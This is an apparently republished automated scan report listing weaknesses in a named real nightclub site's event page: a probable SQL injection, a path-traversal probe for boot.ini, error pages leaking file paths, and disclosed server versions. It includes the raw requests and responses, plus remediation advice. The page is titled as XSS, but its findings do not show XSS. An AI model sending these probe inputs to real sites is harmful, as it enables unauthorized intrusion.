XSS, Cross Site Scripting in event.websterhall.com/show_event_sub.php, CWE-79, CAPEC-86, DORK, GHDB SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
Netsparker - Scan Report Summary
TARGET URL
 http://event.websterhall.com/show_event_sub.p...
SCAN DATE
 7/24/2011 11:36:06 PM
REPORT DATE
 7/25/2011 7:10:12 AM
SCAN DURATION
 00:00:54

Total Requests

Average Speed

req/sec.
12
identified
2
confirmed
1
critical
2
informational

SCAN SETTINGS

Scan Settings
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
8 %
LOW
75 %
INFORMATION
17 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/show_event_sub.php id GET [Probable] SQL Injection No
id GET Internal Server Error Yes
Cookie Not Marked As HttpOnly Yes
Apache Version Disclosure No
PHP Version Disclosure No
OpenSSL Version Disclosure No
Apache Module Version Disclosure No
Frontpage Version Disclosure No
id GET Database Error Message No
id GET Programming Error Message No
id GET E-mail Address Disclosure No
[Possible] Internal Path Leakage (*nix) No
[Probable] SQL Injection

[Probable] SQL Injection
1 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /show_event_sub.php

/show_event_sub.php

http://event.websterhall.com/show_event_sub.php?id=%2527&size=dcaf1%5C

Parameters

Parameter Type Value
id GET %27
size GET dcaf1\

Request

GET /show_event_sub.php?id=%2527&size=dcaf1%5C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: event.websterhall.com
Cookie: PHPSESSID=4cecbb5cd55b098f64f076f0344baa06
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 04:36:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/4.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html


<p class="warning">No Event Selected</p><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Webster Hall New York City | Nightclub | Venue | Record Label - Event</title><meta name="google-site-verification" content="0Qf19Nve42Bz-Pe2DUjICbC_SYZrzVbAEzEeHwUB49s" /><META NAME="description" CONTENT="Largest night club in New York City, nightclub, dance club, new years, ticket sales." /><META NAME="keywords" CONTENT="New York, NYC, nyc, NY, nightlife, nightlife style, night club, new years, new years eve, nite club, nightclub, nightclubs, clubbing, night club promotions, club dance, club search, dance clubs, bar, party, techno, rave, special event, tickets" /><!--link rel="stylesheet" href="css/default.css" media="screen,projection" type="text/css" /><link rel="stylesheet" href="css/lightbox.css" media="screen,projection" type="text/css" /--><!-- JavaScript --><!--script type="text/javascript" src="scripts/prototype.js"></script><script type="text/javascript" src="scripts/lightbox.js"></script--><link href="mellstyle.css" rel="stylesheet" type="text/css" /><link rel="stylesheet" type="text/css" href="css/supercali.css"><link rel="stylesheet" type="text/css" href="css/small.css"><script language="JavaScript" src="js/CalendarPopup.js"></script><script language="JavaScript">document.write(getCalendarStyles());</script><script language="JavaScript" src="js/ColorPicker2.js"></script><script language="JavaScript" src="js/miscfunctions.js"></script><!-- CSS --><link href="css/css-lightbox.css" rel="stylesheet" type="text/css"/><script type="text/javascript" language="javascript"><!-- var vbox; var vfilter; var vcontent; var http_request = false; var myResponse = "Thank You!"; var windowtitle=""; var XMLHttpArray = [ function() {return new XMLHttpRequest()}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Microsoft.XMLHTTP")}]; function adm_onload() { vbox = document.getElementById('box'); vfilter = document.getElementById('filter'); vcontent = document.getElementById('boxcontent'); //vbox.style.display='none'; //vfilter.style.display='none'; } function createXMLHTTPObject() { var xmlhttp = false; for(var i=0; i<XMLHttpArray.length; i++) { try { xmlhttp = XMLHttpArray[i](); } catch(e) { continue; } break; } return xmlhttp; } function makePOSTRequest(url, parameters, title) { http_request = false; /* if (window.XMLHttpRequest) { // Mozilla, Safari,... http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { // set type accordingly to anticipated content type //http_request.overrideMimeType('text/xml'); http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } }*/ http_request = createXMLHTTPObject(); if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } windowtitle = title; http_request.onreadystatechange = alertContents; http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function alertContents() { //vvar box = document.getElementById('box'); var result = ""; // document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var head = document.getElementById('boxtitle'); document.bgColor = "#000000"; head.innerHTML = windowtitle; //var content = document.getElementById('boxcontent'); vcontent.style.padding = "0"; if (http_request.readyState == 4) { if (http_request.status == 200) { // alert(http_request.responseText); result = http_request.responseText; //document.getElementById('list_div').innerHTML = result; } else { // uncomment for debugging // alert('There was a problem with the request.'); } } vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; vcontent.innerHTML = result; // box.style.display='block'; vbox.style.display='block'; } function list_post(id, title, cdate) { //var content = document.getElementById('boxcontent'); vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; var poststr = "id="+id+"&size=small&cdate="+cdate; // uncomment for debugging //alert(poststr); makePOSTRequest('show_event.php', poststr, title); } function openbox(url) { //var box = document.getElementById('box'); //document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var title = document.getElementById('boxtitle'); // title.innerHTML = url; //var content = document.getElementById('boxcontent'); vcontent.style.padding="0"; vcontent.innerHTML = "...dynamic content..."; vcontent.innerHTML = url; //box.style.display='block'; vbox.style.display='block'; } function closebox() { vbox.style.display='none'; vfilter.style.display='none'; //document.getElementById('box').style.display = 'none'; //document.getElementById('filter').style.display = 'none'; document.bgColor='#000000';}--></script><script language="JavaScript" type="text/javascript"><!--function zxcWWHS(){ if (document.all) { zxcCur='hand'; zxcWH=document.documentElement.clientHeight; zxcWW=document.documentElement.clientWidth; zxcWS=document.documentElement.scrollTop; if (zxcWH==0) { zxcWS=document.body.scrollTop; zxcWH=document.body.clientHeight; zxcWW=document.body.clientWidth; } } else if (document.getElementById) { zxcCur='pointer'; zxcWH=window.innerHeight-15; zxcWW=window.innerWidth-15; zxcWS=window.pageYOffset; } zxcWC=Math.round(zxcWW/2); return [zxcWW,zxcWH,zxcWS];}window.onscroll=function(){ var img=document.getElementById('box'); if (!document.all){ img.style.position='fixed'; window.onscroll=null; return; } if (!img.pos){ img.pos=img.offsetTop; } img.style.top=(parseInt(zxcWWHS()[2])+100)+'px';}//--></script><base target="_blank"></head><style type="text/css"><!--body{ background-color:#000000;}--></style><!--<body style="background-color:#000000;" onload='javascript:adm_onload();'>--><div id="filter"></div><div id="box" style="background-color:#000000;"> <div id="boxheader"> <span id="boxtitle"> </span> <span id="boxclose" onClick="closebox()"></span> </div> <div id="boxcontent"> </div></div><table width="750" border="0" align="center" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr> <td valign="top"><!--div class="top"><h4>Webster Hall New York City | Nightclub | Venue | Record Label</h4><h1>Event</h1></div--><div class="content"><br /><b>Warning</b>: mysql_result(): supplied argument is not a valid MySQL result resource in <b>/home/eventweb/public_html/show_event_sub.php</b> on line <b>48</b><br /></td><tr><tr><td height="20"></td></tr></table></body>
Internal Server Error

Internal Server Error
1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /show_event_sub.php

/show_event_sub.php CONFIRMED

http://event.websterhall.com/show_event_sub.php?id=../../../../../../../../../../boot.ini&size=dcaf1%5C

Parameters

Parameter Type Value
id GET ../../../../../../../../../../boot.ini
size GET dcaf1\

Request

GET /show_event_sub.php?id=../../../../../../../../../../boot.ini&size=dcaf1%5C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: event.websterhall.com
Cookie: PHPSESSID=4cecbb5cd55b098f64f076f0344baa06
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 25 Jul 2011 04:36:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 860
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, webmaster@event.websterhall.com and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at event.websterhall.com Port 80</address></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly
1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /show_event_sub.php

/show_event_sub.php CONFIRMED

http://event.websterhall.com/show_event_sub.php?id=1595&size=dcaf1%5C

Identified Cookie

PHPSESSID

Request

GET /show_event_sub.php?id=1595&size=dcaf1%5C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: event.websterhall.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 04:36:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/4.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=4cecbb5cd55b098f64f076f0344baa06; expires=Wed, 24 Aug 2011 04:36:00 GMT; path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Webster Hall New York City | Nightclub | Venue | Record Label - 7pm - Sia</title><meta name="google-site-verification" content="0Qf19Nve42Bz-Pe2DUjICbC_SYZrzVbAEzEeHwUB49s" /><META NAME="description" CONTENT="Largest night club in New York City, nightclub, dance club, new years, ticket sales." /><META NAME="keywords" CONTENT="New York, NYC, nyc, NY, nightlife, nightlife style, night club, new years, new years eve, nite club, nightclub, nightclubs, clubbing, night club promotions, club dance, club search, dance clubs, bar, party, techno, rave, special event, tickets" /><!--link rel="stylesheet" href="css/default.css" media="screen,projection" type="text/css" /><link rel="stylesheet" href="css/lightbox.css" media="screen,projection" type="text/css" /--><!-- JavaScript --><!--script type="text/javascript" src="scripts/prototype.js"></script><script type="text/javascript" src="scripts/lightbox.js"></script--><link href="mellstyle.css" rel="stylesheet" type="text/css" /><link rel="stylesheet" type="text/css" href="css/supercali.css"><link rel="stylesheet" type="text/css" href="css/small.css"><script language="JavaScript" src="js/CalendarPopup.js"></script><script language="JavaScript">document.write(getCalendarStyles());</script><script language="JavaScript" src="js/ColorPicker2.js"></script><script language="JavaScript" src="js/miscfunctions.js"></script><!-- CSS --><link href="css/css-lightbox.css" rel="stylesheet" type="text/css"/><script type="text/javascript" language="javascript"><!-- var vbox; var vfilter; var vcontent; var http_request = false; var myResponse = "Thank You!"; var windowtitle=""; var XMLHttpArray = [ function() {return new XMLHttpRequest()}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Microsoft.XMLHTTP")}]; function adm_onload() { vbox = document.getElementById('box'); vfilter = document.getElementById('filter'); vcontent = document.getElementById('boxcontent'); //vbox.style.display='none'; //vfilter.style.display='none'; } function createXMLHTTPObject() { var xmlhttp = false; for(var i=0; i<XMLHttpArray.length; i++) { try { xmlhttp = XMLHttpArray[i](); } catch(e) { continue; } break; } return xmlhttp; } function makePOSTRequest(url, parameters, title) { http_request = false; /* if (window.XMLHttpRequest) { // Mozilla, Safari,... http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { // set type accordingly to anticipated content type //http_request.overrideMimeType('text/xml'); http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } }*/ http_request = createXMLHTTPObject(); if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; } windowtitle = title; http_request.onreadystatechange = alertContents; http_request.open('POST', url, true); http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http_request.setRequestHeader("Content-length", parameters.length); http_request.setRequestHeader("Connection", "close"); http_request.send(parameters); } function alertContents() { //vvar box = document.getElementById('box'); var result = ""; // document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var head = document.getElementById('boxtitle'); document.bgColor = "#000000"; head.innerHTML = windowtitle; //var content = document.getElementById('boxcontent'); vcontent.style.padding = "0"; if (http_request.readyState == 4) { if (http_request.status == 200) { // alert(http_request.responseText); result = http_request.responseText; //document.getElementById('list_div').innerHTML = result; } else { // uncomment for debugging // alert('There was a problem with the request.'); } } vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; vcontent.innerHTML = result; // box.style.display='block'; vbox.style.display='block'; } function list_post(id, title, cdate) { //var content = document.getElementById('boxcontent'); vcontent.innerHTML = "<img src='../images/loading.gif' border=0>"; var poststr = "id="+id+"&size=small&cdate="+cdate; // uncomment for debugging //alert(poststr); makePOSTRequest('show_event.php', poststr, title); } function openbox(url) { //var box = document.getElementById('box'); //document.getElementById('filter').style.display='block'; vfilter.style.display='block'; var title = document.getElementById('boxtitle'); // title.innerHTML = url; //var content = document.getElementById('boxcontent'); vcontent.style.padding="0"; vcontent.innerHTML = "...dynamic content..."; vcontent.innerHTML = url; //box.style.display='block'; vbox.style.display='block'; } function closebox() { vbox.style.display='none'; vfilter.style.display='none'; //document.getElementById('box').style.display = 'none'; //document.getElementById('filter').style.display = 'none'; document.bgColor='#000000';}--></script><script language="JavaScript" type="text/javascript"><!--function zxcWWHS(){ if (document.all) { zxcCur='hand'; zxcWH=document.documentElement.clientHeight; zxcWW=document.documentElement.clientWidth; zxcWS=document.documentElement.scrollTop; if (zxcWH==0) { zxcWS=document.body.scrollTop; zxcWH=document.body.clientHeight; zxcWW=document.body.clientWidth; } } else if (document.getElementById) { zxcCur='pointer'; zxcWH=window.innerHeight-15; zxcWW=window.innerWidth-15; zxcWS=window.pageYOffset; } zxcWC=Math.round(zxcWW/2); return [zxcWW,zxcWH,zxcWS];}window.onscroll=function(){ var img=document.getElementById('box'); if (!document.all){ img.style.position='fixed'; window.onscroll=null; return; } if (!img.pos){ img.pos=img.offsetTop; } img.style.top=(parseInt(zxcWWHS()[2])+100)+'px';}//--></script><base target="_blank"></head><style type="text/css"><!--body{ background-color:#000000;}--></style><!--<body style="background-color:#000000;" onload='javascript:adm_onload();'>--><div id="filter"></div><div id="box" style="background-color:#000000;"> <div id="boxheader"> <span id="boxtitle"> </span> <span id="boxclose" onClick="closebox()"></span> </div> <div id="boxcontent"> </div></div><table width="750" border="0" align="center" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr> <td valign="top"><!--div class="top"><h4>Webster Hall New York City | Nightclub | Venue | Record Label</h4><h1>7pm - Sia</h1></div--><div class="content"><strong>Wednesday, July 27, 2011 - 7:00 PM</strong><br><p><table width="756" border="0" cellspacing="10" cellpadding="5">
<tbody>
<tr valign="top" bgcolor="#0C0C0C">
<td colspan="2" align="center" valign="middle"><span style="font-size: large; "><br />
<strong><font color="#FF0000">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 13px; line-height: 16px; ">
<h1 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 21px; font-weight: normal; line-height: 0.95em; color: rgb(153, 0, 0); ">Sia</h1>
<h2 style="margin-top: 0px; margin-right: 0px; margin-bottom: 0.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 13px; font-weight: normal; line-height: 1.23em; "><span style="color: rgb(255, 255, 255); ">Oh Land</span></h2>
</span> </meta>
</font></strong></span></td>
</tr>
<tr valign="top">
<td width="355">
<table width="100%" border="0" cellspacing="5" cellpadding="5">
<tbody>
<tr bgcolor="#0C0C0C">
<td width="22%" valign="top"><b><span style="font-size: small; ">Ages</span></b></td>
<td width="78%"><span style="color: rgb(255, 255, 255); "><span style="font-size: small; ">18+</span></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td valign="top"><span style="color: rgb(255, 255, 255); "><b><span style="font-size: small; ">Doors</span></b></span></td>
<td><span style="color: rgb(255, 255, 255); "><span style="font-size: small; ">7pm</span></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td valign="top"><span style="color: rgb(255, 255, 255); "><b><span style="font-size: small; ">Tickets</span></b></span></td>
<td valign="top"><font class="Apple-style-span" color="#ffffff" size="2">$26 advance / $30 day of show&nbsp;</font><br />
<meta charset="utf-8"><font class="Apple-style-span" color="#990000" face="'Times New Roman', Times, serif"><span class="Apple-style-span" style="font-size: 11px; line-height: 13px; text-transform: uppercase; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px;">
<meta charset="utf-8" /><span class="Apple-style-span" style="color: rgb(255, 0, 0); font-family: Arial, Helvetica, sans-serif; -webkit-border-horizontal-spacing: 5px; -webkit-border-vertical-spacing: 5px; line-height: normal; text-transform: none; font-size: medium; "><img width="78" height="16" alt="" src="http://event.websterhall.com/upload/www_ticketweb(1).jpeg" /></span><br type="_moz" />
</span></font> </meta>
<span style="font-size: small; "><font class="Apple-style-span" color="#FF0000"><b><br />
</b></font></span></td>
</tr>
<tr bgcolor="#0C0C0C">
<td colspan="2" valign="top"><span class="Apple-style-span" style="font-size: small; "><b>
<div id="artist-info"><dl> <dt><font class="Apple-style-span" color="#FF0000">
<div id="artist-info">
<div id="artist-info">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(153, 0, 0); font-family: 'Times New Roman', Times, serif; font-size: 13px; line-height: 16px; text-transform: uppercase; ">oh land</span> </meta>
</div>
<div id="artist-info">[&nbsp;<a href="http://www.myspace.com/ohlandmusic">MYSPACE</a>]<br />
<span style="color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 12px; line-height: 16px; ">
<meta charset="utf-8">
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span">Oh Land is a peculiar new cinematic electropop Dane who recently sailed across the sea to the artistic haven of Brooklyn, NY. With an opera singer for a mother, a theater organist for a father and Bj&ouml;rk's Homogenic on constant rotation, Oh Land was enraptured by the combination of experimental and classical arts. &quot;My goal is to sound like I'm from 2050, but still feel really classic, like the music is an old friend,&quot; said Oh Land. She spent her days pirouetting as a ballet dancer at the Danish Royal Ballet Academy when an injury forced her to reinvent herself and discover her true talent and passion as a musician. Oh Land soon released her first album, Fauna, which garnered critical acclaim in her homeland of Denmark. Her soundscapes are lavish, crunchy, symphonic, brute and captivated with rhythms that fly apart. She translates the sounds live via her &quot;contraption&quot; - a homemade one-woman-band music box topped with balloon video projections (seeing is believing). Her music is for movement and new songs such as the thumping &quot;Sun of a Gun&quot; and euphoric &quot;White Nights&quot; have proven to make even the most portentous get up and dance. Having been discovered by Epic Records at 2009's SXSW, she released her US debut EP on October 19, 2010.</span><br />
<br />
</span> <br />
<div id="artist-info"><span style="color: rgb(255, 0, 0); ">
<meta charset="utf-8"><span class="Apple-style-span" style="color: rgb(153, 0, 0); font-size: 13px; text-transform: uppercase; ">Sia<br />
</span>&nbsp;[ </meta>
</span><span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: Arial, Verdana, sans-serif; line-height: normal; font-size: small; -webkit-border-horizontal-spacing: 5px; -webkit-border-vertical-spacing: 5px; ">
<div id="artist-info" style="display: inline !important; "><dl style="display: inline !important; "><dt style="display: inline !important; "><span style="color: rgb(255, 0, 0); ">
<div id="artist-info" style="display: inline !important; ">
<div id="artist-info" style="display: inline !important; "><a target="_blank" href="http://siamusic.net/">OFFICIAL WEBSITE</a> :&nbsp;</div>
</div>
</span><font class="Apple-style-span" color="#FF0000">
<div id="artist-info" style="display: inline !important; ">
<div id="artist-info" style="display: inline !important; "><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span" style="font-family: 'Times New Roman', Times, serif; font-weight: normal; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; font-size: 12px; line-height: 16px; ">
<div id="artist-info" style="display: inline !important; "><span style="color: rgb(255, 0, 0); "><a target="_blank" href="http://www.myspace.com/siamusic">MYSPACE</a>]</span><br />
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); ">
<meta charset="utf-8"><span style="color: rgb(255, 255, 255); "><span class="Apple-style-span">Sia Furler, a native Australian, was born on December 18th, 1975 and was destined to be an entertainer. At a young age she would perform for her family and friends with her interpretations of Madonna, Cyndi Lauper and Men at Work. If one should be so lucky to peruse her family albums, they would certainly find photos of Sia as a child adorning pink tutus and roller skates in poses fit for Cirque du Soleil. When Sia was 9 she performed with her father's band The Soda Jerx covering the song &quot;Shimmy Shimmy Coco Bop&quot;. Be..
Apache Version Disclosure

Apache Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /show_event_sub.php

/show_event_sub.php

http://event.websterhall.com/show_event_sub.php?id=1595&size=dcaf1%5C

Extracted Version

2.0.63 (Unix)

Request

GET /show_event_sub.php?id=1595&size=dcaf1%5C HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: event.websterhall.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 04:36:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/4.4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=6d168262eb70370a72912db093f1d7e5; expires=Wed, 24 Aug 2011 04:36:00 GMT; path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Webster Hall New York City | Nightclub | Venue | Record Label - 7pm - Sia</title><meta name="google-site-verification" content="0Qf19Nve42Bz-Pe2DUjICbC_SYZrzVbAEzEeHwUB49s" /><META NAME="description" CONTENT="Largest night club in New York City, nightclub, dance club, new years, ticket sales." /><META NAME="keywords" CONTENT="New York, NYC, nyc, NY, nightlife, nightlife style, night club, new years, new years eve, nite club, nightclub, nightclubs, clubbing, night club promotions, club dance, club search, dance clubs, bar, party, techno, rave, special event, tickets" /><!--link rel="stylesheet" href="css/default.css" media="screen,projection" type="text/css" /><link rel="stylesheet" href="css/lightbox.css" media="screen,projection" type="text/css" /--><!-- JavaScript --><!--script type="text/javascript" src="scripts/prototype.js"></script><script type="text/javascript" src="scripts/lightbox.js"></script--><link href="mellstyle.css" rel="stylesheet" type="text/css" /><link rel="stylesheet" type="text/css" href="css/supercali.css"><link rel="stylesheet" type="text/css" href="css/small.css"><script language="JavaScript" src="js/CalendarPopup.js"></script><script language="JavaScript">document.write(getCalendarStyles());</script><script language="JavaScript" src="js/ColorPicker2.js"></script><script language="JavaScript" src="js/miscfunctions.js"></script><!-- CSS --><link href="css/css-lightbox.css" rel="stylesheet" type="text/css"/><script type="text/javascript" language="javascript"><!-- var vbox; var vfilter; var vcontent; var http_request = false; var myResponse = "Thank You!"; var windowtitle=""; var XMLHttpArray = [ function() {return new XMLHttpRequest()}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Msxml2.XMLHTTP")}, function() {return new ActiveXObject("Microsoft.XMLHTTP")}]; function adm_onload() { vbox = document.getElementById('box'); vfilter = document.getElementById('filter'); vcontent = document.getElementById('boxcontent'); //vbox.style.display='none'; //vfilter.style.display='none'; } function createXMLHTTPObject() { var xmlhttp = false; for(var i=0; i<XMLHttpArray.length; i++) { try { xmlhttp = XMLHttpArray[i](); } catch(e) { continue; } break; } return xmlhttp; } function makePOSTRequest(url, parameters, title) { http_request = false; /* if (window.XMLHttpRequest) { // Mozilla, Safari,... http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { // set type accordingly to anticipated content type //http_request.overrideMimeType('text/xml'); http_request.overrideMimeType('text/html'); } } else if (window.ActiveXObject) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } }*/ http_request = createXMLHTTPObject(); if (!http_request) { 